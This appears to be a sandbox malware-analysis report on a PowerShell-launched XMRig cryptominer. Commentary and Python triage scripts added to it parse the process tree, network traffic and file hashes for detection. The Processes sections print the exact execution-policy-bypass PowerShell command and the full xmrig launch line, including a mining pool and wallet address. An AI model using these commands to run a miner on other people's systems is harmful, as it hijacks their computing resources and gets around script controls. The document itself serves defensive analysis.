| PID 4544 wrote to memory of 2492 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4544 wrote to memory of 2492 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0ojcfymo.sxv.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral17
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win10-20240404-en
Max time kernel
291s
Max time network
298s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4488 wrote to memory of 3604 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4488 wrote to memory of 3604 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 20.231.121.79:80 | | tcp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.179.89.13.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r5d3kgzm.fcm.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral25
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win10-20240404-en
Max time kernel
297s
Max time network
259s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3604 wrote to memory of 2692 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3604 wrote to memory of 2692 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
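The process tree above is the whole story of this detonation: powershell.exe (PID 3604) runs a script from the user's Temp folder with `-ExecutionPolicy bypass`, then spawns xmrig.exe (PID 2692) with the complete mining configuration on its command line (RandomX via `-a rx`, a TLS stratum pool on port 443, and an unmineable-style `COIN:wallet.worker` user field). The `SeLockMemoryPrivilege` requests in the AdjustPrivilegeToken table are xmrig enabling large pages for RandomX, so they belong to the same activity. The Python below is an added triage example, not part of the report or of XMRig: it tokenises the command lines, pulls the pool, wallet and worker out of xmrig's arguments and flags the parent/child chain. The event list is constructed; PIDs 3604 and 2692, the image paths and the command lines are taken from the report, while the parent PID 1000 and the notepad.exe event are assumptions.

```python
"""Triage helper for the Processes section: tokenise the command lines, recover the
pool, wallet and worker from xmrig's arguments, and flag the powershell.exe ->
xmrig.exe parent/child chain."""
import re
from urllib.parse import urlsplit

# Constructed process-creation events. PIDs 3604 and 2692, the image paths and the
# command lines are copied from the report; the parent PID 1000 and the benign
# notepad.exe event are assumptions added so the chain logic has something to skip.
EVENTS = [
    {"pid": 3604, "ppid": 1000,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"'},
    {"pid": 2692, "ppid": 3604,
     "image": r"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe",
     "cmdline": (r'"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx '
                 r'-o stratum+ssl://rx.unmineable.com:443 '
                 r'-u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x')},
    {"pid": 4100, "ppid": 1000,
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
]

# xmrig's pool-related options (short and long spellings) and the key each is filed under.
MINER_FLAGS = {"-a": "algo", "--algo": "algo", "-o": "pool", "--url": "pool",
               "-u": "user", "--user": "user", "-p": "pass", "--pass": "pass"}
# A standard Monero address: 95 base58 characters starting with '4'.
MONERO_ADDRESS = re.compile(r"4[1-9A-HJ-NP-Za-km-z]{94}")


def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping double-quoted paths whole."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def parse_xmrig_args(cmdline):
    """Return the mining configuration carried on an xmrig command line, or None
    when the line has no pool option (i.e. it is not a miner invocation)."""
    toks = tokenize(cmdline)
    opts = {}
    for i, tok in enumerate(toks):
        key = MINER_FLAGS.get(tok.lower())
        if key and i + 1 < len(toks):
            opts[key] = toks[i + 1]
    if "pool" not in opts:
        return None
    pool = opts["pool"]
    if "://" not in pool:                 # a bare host:port means plain (non-TLS) stratum
        pool = "stratum+tcp://" + pool
    url = urlsplit(pool)
    user = opts.get("user", "")
    # unmineable-style user: COIN:<address>.<worker>; plain xmrig: <address>[.<worker>]
    coin, sep, rest = user.partition(":")
    if not sep:
        coin, rest = None, user
    address, _, worker = rest.partition(".")
    return {
        "algo": opts.get("algo"),
        "scheme": url.scheme, "pool_host": url.hostname, "pool_port": url.port,
        "tls": url.scheme.endswith(("ssl", "tls")),
        "coin": coin, "wallet": address, "worker": worker or None,
        "monero_std_address": bool(MONERO_ADDRESS.fullmatch(address)),
    }


def flag_miner_chain(events):
    """One finding per process whose command line parses as a miner, with the
    facts about its parent that a detection rule would key on."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        miner = parse_xmrig_args(e["cmdline"])
        if miner is None:
            continue
        parent = by_pid.get(e["ppid"])
        parent_cmd = parent["cmdline"] if parent else ""
        findings.append({
            "pid": e["pid"], "image": e["image"], "miner": miner, "parent_pid": e["ppid"],
            "parent_is_powershell": bool(parent) and parent["image"].lower().endswith("\\powershell.exe"),
            # matches -ExecutionPolicy bypass, -ep bypass, -exec bypass
            "parent_bypasses_policy": bool(re.search(r"-e\w*\s+bypass\b", parent_cmd, re.I)),
            "dropped_in_temp": "\\appdata\\local\\temp\\" in e["image"].lower(),
        })
    return findings


if __name__ == "__main__":
    for f in flag_miner_chain(EVENTS):
        print(f"PID {f['pid']} ({f['image']}) spawned by PID {f['parent_pid']}: {f['miner']}")
```

Keying on the parsed pool host and the wallet rather than on the file name matters here: the binary is an unmodified xmrig build that the operator can rename, but the pool, wallet and worker have to stay on the command line (or in a config file) for the miner to earn anything.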
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.162.46.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.56.20.217.in-addr.arpa | udp |
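Reading the Network table: the forward lookups and TCP sessions show the staging path (github.com, then objects.githubusercontent.com, which serves GitHub release assets) followed by the pool connection to rx.unmineable.com on 443 over TLS, so port-based egress rules will not separate it from ordinary HTTPS. The `in-addr.arpa` and `ip6.arpa` rows are the sandbox's own reverse (PTR) lookups of addresses it talked to; two of them (104.46.162.226 and 217.20.56.43) have no matching forward row in this table, which is the cue to pull the pcap. The Python below is an added example, not from the report: it decodes the PTR names back into addresses and sorts the rows into pool, staging and reverse-lookup noise. The rows are copied from the table; the pool and staging suffix lists are assumptions.

```python
"""Sort the Network table into pool traffic, staging and reverse-lookup noise, and
decode the sandbox's PTR queries back into the addresses they refer to."""
import ipaddress

# Rows copied from the report's Network table: (country, destination, domain, proto).
ROWS = [
    ("US", "8.8.8.8:53", "github.com", "udp"),
    ("GB", "20.26.156.215:443", "github.com", "tcp"),
    ("US", "8.8.8.8:53", "0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa", "udp"),
    ("US", "8.8.8.8:53", "215.156.26.20.in-addr.arpa", "udp"),
    ("US", "8.8.8.8:53", "objects.githubusercontent.com", "udp"),
    ("US", "185.199.108.133:443", "objects.githubusercontent.com", "tcp"),
    ("US", "8.8.8.8:53", "133.108.199.185.in-addr.arpa", "udp"),
    ("US", "8.8.8.8:53", "rx.unmineable.com", "udp"),
    ("GB", "161.35.34.195:443", "rx.unmineable.com", "tcp"),
    ("US", "8.8.8.8:53", "195.34.35.161.in-addr.arpa", "udp"),
    ("US", "8.8.8.8:53", "226.162.46.104.in-addr.arpa", "udp"),
    ("US", "8.8.8.8:53", "43.56.20.217.in-addr.arpa", "udp"),
]

# Assumed suffix lists: the pool list holds only the domain seen in this report, and
# the staging list covers GitHub and its release-asset CDN that the table shows being fetched.
POOL_SUFFIXES = ("unmineable.com",)
STAGING_SUFFIXES = ("github.com", "githubusercontent.com")
RESOLVER = ipaddress.ip_address("8.8.8.8")   # the sandbox's DNS server, per the table


def _under(domain, suffixes):
    d = domain.lower().rstrip(".")
    return any(d == s or d.endswith("." + s) for s in suffixes)


def ptr_to_ip(name):
    """Decode an in-addr.arpa / ip6.arpa owner name to an ip_address; None if it is not one.
    in-addr.arpa carries the four octets reversed; ip6.arpa carries 32 nibbles reversed."""
    labels = name.lower().rstrip(".").split(".")
    try:
        if labels[-2:] == ["in-addr", "arpa"] and len(labels) == 6:
            return ipaddress.ip_address(".".join(labels[3::-1]))
        if labels[-2:] == ["ip6", "arpa"] and len(labels) == 34:
            nibbles = "".join(labels[31::-1])
            return ipaddress.ip_address(":".join(nibbles[i:i + 4] for i in range(0, 32, 4)))
    except ValueError:
        return None
    return None


def triage(rows):
    """Split rows into pool / staging / reverse-lookup sets and list the addresses
    that were reverse-resolved without a matching TCP session in the table."""
    connected = {}   # domain -> IPs the sample opened a TCP session to
    ptr_ips = set()  # addresses the sandbox reverse-resolved
    pool, staging = [], []
    for _country, dest, domain, proto in rows:
        ip = ptr_to_ip(domain)
        if ip is not None:
            ptr_ips.add(ip)
            continue
        if proto == "tcp":
            host, _, _port = dest.rpartition(":")
            connected.setdefault(domain, set()).add(ipaddress.ip_address(host))
        if _under(domain, POOL_SUFFIXES):
            pool.append((domain, dest, proto))
        elif _under(domain, STAGING_SUFFIXES):
            staging.append((domain, dest, proto))
    seen = set().union(*connected.values())
    # IPv4 addresses that were reverse-resolved but have no forward/TCP row here: check the pcap.
    unexplained = {ip for ip in ptr_ips if ip.version == 4 and ip != RESOLVER and ip not in seen}
    return {"pool": pool, "staging": staging, "connected": connected,
            "ptr_ips": ptr_ips, "unexplained_ptr_ips": unexplained}


if __name__ == "__main__":
    result = triage(ROWS)
    for key in ("pool", "staging"):
        print(key, result[key])
    print("reverse-resolved:", sorted(map(str, result["ptr_ips"])))
    print("no forward row:", sorted(map(str, result["unexplained_ptr_ips"])))
```

The `ip6.arpa` row decodes to `808:808::`, which is just the four bytes of the resolver's address 8.8.8.8 laid out as an IPv6 prefix; it is resolver-side noise and not a host the sample contacted.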
Files
memory/3604-0-0x00007FFB689D3000-0x00007FFB689D4000-memory.dmp
memory/3604-5-0x00000206FB9B0000-0x00000206FB9D2000-memory.dmp
memory/3604-8-0x00007FFB689D0000-0x00007FFB693BC000-memory.dmp
memory/3604-9-0x00000206FC020000-0x00000206FC096000-memory.dmp
memory/3604-10-0x00007FFB689D0000-0x00007FFB693BC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_naoomkbw.q3h.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/3604-25-0x00007FFB689D0000-0x00007FFB693BC000-memory.dmp
memory/3604-29-0x00007FFB689D3000-0x00007FFB689D4000-memory.dmp
memory/3604-30-0x00007FFB689D0000-0x00007FFB693BC000-memory.dmp
memory/3604-31-0x00007FFB689D0000-0x00007FFB693BC000-memory.dmp
memory/3604-64-0x00000206FBED0000-0x00000206FBEDA000-memory.dmp
memory/3604-51-0x00000206FBEE0000-0x00000206FBEF2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
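Two files appear under Files. The `__PSScriptPolicyTest_*.ps1` file is PowerShell's own probe, written to %TEMP% with the single byte `1` to test whether AppLocker/WDAC script enforcement applies; its hashes above are exactly the MD5, SHA-1, SHA-256 and SHA-512 of `1`, so it is noise rather than a dropped script. The payload is xmrig.exe unpacked into an `xmrig-6.21.3` directory under Temp. The Python below is an added example, not from the report: it recomputes the probe's hashes and classifies both entries, with the paths and hashes copied from the report and the dictionary layout of the entries assumed.

```python
"""Classify the Files entries of this report: separate PowerShell's policy-probe
artifact (benign, hash of b"1") from the dropped miner binary."""
import hashlib
import re

# Entries copied from the report's Files section; the dict layout is assumed.
FILES = [
    {"path": r"C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_naoomkbw.q3h.ps1",
     "md5": "c4ca4238a0b923820dcc509a6f75849b",
     "sha1": "356a192b7913b04c54574d18c28d46e6395428ab",
     "sha256": "6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b",
     "sha512": "4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a"},
    {"path": r"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe",
     "md5": "205ad9eb6acd6f58752899669b69fe74",
     "sha1": "bedb78ac5034259b86c2cbc915de2e861e8d7604",
     "sha256": "2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda",
     "sha512": "28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3"},
]

# PowerShell writes __PSScriptPolicyTest_<rand>.<rand>.ps1 to %TEMP% containing the
# single byte "1" to probe whether AppLocker/WDAC script enforcement applies.
POLICY_PROBE_NAME = re.compile(r"\\__PSScriptPolicyTest_[a-z0-9]+\.[a-z0-9]+\.ps1$", re.I)
POLICY_PROBE_BODY = b"1"
MINER_PATH = re.compile(r"\\xmrig[^\\]*\\xmrig\.exe$", re.I)
ALGORITHMS = ("md5", "sha1", "sha256", "sha512")


def digests(data):
    """Hex digests of `data` under the four algorithms the report lists."""
    return {alg: hashlib.new(alg, data).hexdigest() for alg in ALGORITHMS}


def hashes_match(entry, expected):
    """True when every algorithm present in `entry` agrees with `expected`."""
    present = [alg for alg in ALGORITHMS if entry.get(alg)]
    return bool(present) and all(entry[alg].lower() == expected[alg] for alg in present)


def classify(entry):
    """Label one Files entry. The probe is only called benign when its content
    hashes as b"1"; a probe-looking name with other content deserves a look."""
    path = entry["path"]
    if POLICY_PROBE_NAME.search(path):
        if hashes_match(entry, digests(POLICY_PROBE_BODY)):
            return "powershell-policy-probe"
        return "probe-name-unexpected-content"
    if MINER_PATH.search(path):
        return "dropped-miner"
    return "unknown"


if __name__ == "__main__":
    for entry in FILES:
        print(classify(entry), entry["path"])
```

The xmrig.exe hashes are left for comparison against the published 6.21.3 release assets (the objects.githubusercontent.com fetch in the Network table is where release assets are served from); an exact match means an unmodified stock build, and a mismatch is the point at which the binary itself needs a closer look.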
memory/2692-93-0x0000014F363F0000-0x0000014F36410000-memory.dmp
memory/2692-94-0x00007FF7D4BF0000-0x00007FF7D5823000-memory.dmp
memory/2692-95-0x00007FF7D4BF0000-0x00007FF7D5823000-memory.dmp
memory/2692-96-0x00007FF7D4BF0000-0x00007FF7D5823000-memory.dmp
memory/2692-97-0x00007FF7D4BF0000-0x00007FF7D5823000-memory.dmp
memory/2692-98-0x00007FF7D4BF0000-0x00007FF7D5823000-memory.dmp
memory/2692-99-0x00007FF7D4BF0000-0x00007FF7D5823000-memory.dmp
memory/2692-100-0x00007FF7D4BF0000-0x00007FF7D5823000-memory.dmp
memory/2692-101-0x00007FF7D4BF0000-0x00007FF7D5823000-memory.dmp
memory/2692-102-0x00007FF7D4BF0000-0x00007FF7D5823000-memory.dmp
memory/2692-103-0x00007FF7D4BF0000-0x00007FF7D5823000-memory.dmp
memory/2692-104-0x00007FF7D4BF0000-0x00007FF7D5823000-memory.dmp
memory/2692-105-0x00007FF7D4BF0000-0x00007FF7D5823000-memory.dmp
memory/2692-106-0x00007FF7D4BF0000-0x00007FF7D5823000-memory.dmp
memory/2692-107-0x00007FF7D4BF0000-0x00007FF7D5823000-memory.dmp
memory/2692-108-0x00007FF7D4BF0000-0x00007FF7D5823000-memory.dmp
memory/2692-109-0x00007FF7D4BF0000-0x00007FF7D5823000-memory.dmp
memory/2692-110-0x00007FF7D4BF0000-0x00007FF7D5823000-memory.dmp
memory/2692-111-0x00007FF7D4BF0000-0x00007FF7D5823000-memory.dmp
memory/2692-112-0x00007FF7D4BF0000-0x00007FF7D5823000-memory.dmp
memory/2692-113-0x00007FF7D4BF0000-0x00007FF7D5823000-memory.dmp
memory/2692-114-0x00007FF7D4BF0000-0x00007FF7D5823000-memory.dmp
memory/2692-115-0x00007FF7D4BF0000-0x00007FF7D5823000-memory.dmp
memory/2692-116-0x00007FF7D4BF0000-0x00007FF7D5823000-memory.dmp
memory/2692-117-0x00007FF7D4BF0000-0x00007FF7D5823000-memory.dmp
memory/2692-118-0x00007FF7D4BF0000-0x00007FF7D5823000-memory.dmp
memory/2692-119-0x00007FF7D4BF0000-0x00007FF7D5823000-memory.dmp
memory/2692-120-0x00007FF7D4BF0000-0x00007FF7D5823000-memory.dmp